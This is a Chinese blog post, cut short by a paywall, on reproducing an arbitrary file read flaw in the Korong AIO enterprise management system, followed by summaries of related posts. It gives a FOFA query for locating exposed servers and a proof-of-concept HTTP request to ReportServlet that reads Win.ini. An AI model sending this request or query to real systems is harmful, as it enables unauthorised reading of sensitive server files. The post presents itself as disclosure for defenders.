漏洞复现-科荣AIO存在任意文件读取漏洞（附漏洞检测脚本）

最新推荐文章于 2024-08-15 09:23:50 发布

炼金术师诸葛亮

最新推荐文章于 2024-08-15 09:23:50 发布

阅读量623

点赞数 9

文章标签：安全 web安全

本文链接：https://blog.csdn.net/jjjj1029056414/article/details/135276017

版权

免责声明

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行负责

漏洞描述

科荣AIO---集成进销存,财务,OA,CRM,HR,电子商务一体化企业管理软件。该系统存在任意文件读取漏洞

fofa语句

body="changeAccount('8000')"

poc加检测

GET /ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

炼金术师诸葛亮

关注关注

9
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
漏洞复现-科荣AIO存在任意文件读取漏洞（附漏洞检测脚本）

漏洞复现-科荣AIO存在任意文件读取漏洞，附带自己写的poc脚本
复制链接

扫一扫

科荣 AIO ReadFile 任意文件读取（含批量验证poc）

weixin_43567873的博客

04-08

科荣 AIO ReadFile 任意文件读取（含批量验证poc）

科荣 AIO 管理系统文件读取漏洞复现 [附POC]

薛定谔嘚喵博客

12-01

212

科荣AIO管理系统存在文件读取漏洞，攻击者通过未经授权的访问，构造恶意请求并读取系统中的敏感文件。该漏洞可能导致泄露配置信息、用户数据等敏感信息，为确保系统安全，建议尽快修复漏洞，实施有效地输入验证和访问控制机制。

参与评论您还未登录，请先登录后发表或查看评论

科荣AIO多个接口存在任意文件读取漏洞

m0_46604997的博客

04-25

296

科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台)，集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣AIO管理系统多个接口存在文件读取漏洞，该漏洞可能导致泄露配置信息、用户数据等敏感信息，为确保系统安全，建议尽快修复漏洞，并且设置有效的输入验证和访问控制机制。Fofa语法：body="changeAccount('8000')"

科荣 AIO 管理系统任意文件读取

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

11-24

326

科荣AIO管理系统存在文件读取漏洞，攻击者可以通过未经授权的访问，构造恶意请求并读取系统中的敏感文件。该漏洞可能导致泄露配置信息、用户数据等敏感信息，为确保系统安全，建议尽快修复漏洞，实施有效的输入验证和访问控制机制。

【漏洞复现】科荣 AIO任意文件读取漏洞_04

fushuang333的博客

12-31

834

【漏洞复现】科荣 AIO任意文件读取。攻击者就可以在被访问的文件系统中读取或写入任意内容，往往能够使攻击者从服务器上获取敏感信息文件，正常读取的文件没有经过校验或者不严格，用户可以控制这个变量读取任意文件。

科荣 AIO ReadFile 任意文件读取漏洞复现

0xSec

04-06

409

科荣AIO ReadFile 接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

【漏洞复现】科荣AIO管理系统-任意文件读取-PublicServlet

知黑而守白

06-19

科荣AIO公司服务软件企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统PublicServlet接口处存在任意文件读取漏洞，恶意攻击者可能会利用此漏洞读取敏感文件，造成信息泄露。

漏洞复现-科荣AIO UtilServlet任意命令执行漏洞（附漏洞检测脚本）

jjjj1029056414的博客

01-17

634

漏洞复现-科荣AIO UtilServlet任意命令执行漏洞，附带自己写的poc脚本

科荣AIO管理系统V7版-用户手册

06-24

《科荣AIO管理系统V7版-用户手册》是一份详尽的指南，旨在帮助用户理解和操作科荣AIO管理系统的最新版本——V7。这份手册不仅适合初学者，也适用于有一定经验的用户，提供了从基础到进阶的全方位学习资料。手册的...

免费ERP 科荣一体化管理软件AIO-II v7.0.2924

10-15

科荣AIO企业一体化管理解决方案,通过ERP（进销存财务）、OA（办公自动化）、CRM（客户关系管理）、UDP（自定义平台），集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决

科荣OA基础操作手册(实例篇).docx

05-26

科荣OA基础操作手册(实例篇

科荣线路板公司岗位职责说明书doc59页.doc

10-07

科荣线路板公司岗位职责说明书doc59页.doc

等保测评中的安全需求分析：构建精准的信息安全防护体系

最新发布

w13359990065的博客

08-15

546

在实施数字化转型的过程中，企业应将安全需求分析视为持续优化安全防护体系的关键环节，通过跨部门合作、员工培训、技术应用等策略，不断调整和优化安全需求，为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导，实施了详细的安全需求分析，识别了其关键业务功能和信息资产，包括客户数据、交易系统等，基于风险评估的结果，制定了针对性的安全控制措施，如多因素认证、数据加密、网络隔离等，有效提升了信息安全防护水平。实施安全需求分析的过程中，企业可能面临一些挑战，如技术更新快、业务需求变化频繁、安全资源有限等。

[Linux]车联网安全-大佬都在用的渗透测试系统

Liyu_6618的博客

08-12

305

天刃是一个基于Ubuntu 18.04的车联网渗透测试发行版系统，主要用于针对车联网设备进行安全评估。系统内置上百个车联网安全测试专用工具，旨在解决车联网安全从业人员测试工具杂乱、测试环境配置复杂、无工具可用等一系列问题。本系统提供ISO镜像安装与OVA镜像导入方式安装，推荐使用OVA导入虚拟机操作更为简单方便。覆盖逆向、CAN、车载以太网、WiFi、蓝牙、云平台等安全测试。导入或安装成功后开机使用iov/root进行登录，登录成功后会显示用户体验计划，可选择同意或拒绝，确认完成后即可开始使用。

便携式手提加固计算机：搭载飞腾4核/8核处理器的加固计算机

Future_2024的博客

08-13

587

便携式手提加固计算机：搭载飞腾4核/8核处理器的加固计算机

ctf 堆栈结构

qq_69100706的博客

08-12

381

CTF（Capture The Flag）竞赛中，理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。

Scout Suite：开源云安全审计工具

网络研究观

08-12

313

Scout Suite 是一个开源、多云安全审计工具，旨在评估云环境的安全态势。

奥运会期间网络安全防护的重要性

gmqqcsdn的博客

08-12

505

它为运动员提供了公平竞争的舞台，为观众带来了精彩的观赛体验，也维护了奥运会的尊严和声誉。想象一下，如果奥运会的官方网站被黑客攻击，发布了虚假的赛事结果或负面信息，那将对奥运会的公信力造成极大的冲击。赛事的组织协调、运动员的信息管理、观众的票务与服务，无一不依赖于网络的稳定运行。通过强大的网络安全防护体系，能够及时检测和抵御这些威胁，保障网络的正常运行。北京时间凌晨3点，历史17天的巴黎奥运会迎来落幕，在此先祝贺伟大的祖国获得了总奖牌榜第二，金牌榜并列第一的好成绩，对征战在奥运会赛场的运动健儿们致敬！

科荣aio管理系统v7版-用户手册

12-02

科荣AIO管理系统V7版是一款全新升级的管理系统，旨在为用户提供更加便捷高效的操作体验。本用户手册将详细介绍系统的功能及操作方法，帮助用户快速上手使用。系统功能方面，科荣AIO管理系统V7版提供了多种功能模块，包括人力资源管理、财务管理、销售管理、库存管理等。用户可以根据自身需求选择相应的模块进行操作。例如，人力资源管理模块提供了员工信息管理、考勤管理、工资管理等功能，用户可以通过该模块实现对人力资源的全面管理。在操作方法方面，用户可以通过登录系统后，选择对应的模块进入相应页面。系统界面简洁清晰，用户可以通过菜单栏或快捷入口快速找到所需功能。在每个页面中，用户可以根据提示输入相应的信息，例如添加或修改员工信息、录入财务数据等。系统还提供了数据查询和报表生成等功能，用户可以方便地查看和分析数据。此外，科荣AIO管理系统V7版还具有用户权限管理功能，管理员可以根据需要设置不同用户的权限，确保系统的安全性和数据的保密性。总之，科荣AIO管理系统V7版是一款功能强大、操作简便的管理系统，通过本用户手册的详细介绍，用户可以迅速掌握系统的使用方法，提高工作效率。如果用户在使用过程中遇到问题，可以参考本手册或联系系统供应商的客服人员寻求帮助。